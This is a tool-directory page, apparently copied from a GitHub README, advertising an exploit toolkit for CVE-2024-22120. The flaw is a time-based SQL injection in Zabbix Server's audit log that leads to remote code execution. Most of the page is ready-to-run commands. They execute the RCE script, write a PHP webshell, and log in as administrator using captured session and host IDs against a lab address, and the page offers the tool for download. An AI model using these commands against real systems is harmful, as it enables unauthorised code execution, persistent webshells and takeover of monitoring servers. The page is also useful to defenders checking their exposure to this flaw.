Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-22120-RCE — Time Based SQL Injection in Zabbix Server Audit Log --> RCE | Kitploit
Tools/GitHubGitHub/w01fh4cker/cve-2024-22120-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubw01fh4cker/cve-2024-22120-rce

CVE-2024-22120-RCE

Time Based SQL Injection in Zabbix Server Audit Log --> RCE

View Repository
1402222 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-22120 ToolKit

Affected Version/s

root@kitploit:~
6.0.0 - 6.0.27
6.4.0 - 6.4.12
7.0.0alpha1

Credit

https://x.com/mf0cuz

https://support.zabbix.com/browse/ZBX-24505

https://packetstormsecurity.com/files/137454/Zabbix-3.0.3-Remote-Command-Execution.html

Premise

  • a low-privilege user

  • Have permission to execute scripts

Usage

CVE-2024-22120-RCE

Capture packets to obtain sessionid and hostid:

root@kitploit:~
python -m pip install requests pwntools

python CVE-2024-22120-RCE.py --ip 192.168.198.136 --sid f026d1c7a3c36537cfe78fed35c7456a --hostid 10084

CVE-2024-22120-Webshell(Unable to use in most cases)

if you already have a session ID of Administrator privileged user, try:

root@kitploit:~
python CVE-2024-22120-Webshell.py --ip 192.168.198.136 --aid fe647173d7769d55a43f161a68b256e0 --hostid 10084 --file shell.php

else:

root@kitploit:~
python CVE-2024-22120-Webshell.py --ip 192.168.198.136 --sid f026d1c7a3c36537cfe78fed35c7456a --hostid 10084 --shell shell.php

But almost most of them cannot be written to the webshell through echo, because the execution user is zabbix:

CVE-2024-22120-LoginAsAdmin

root@kitploit:~
python CVE-2024-22120-LoginAsAdmin.py --ip 192.168.198.136 --sid decf4ef56988027d62ca1db2a00d8346 --hostid 10084

test:

replace then refresh:

login as admin!!!

Download Tool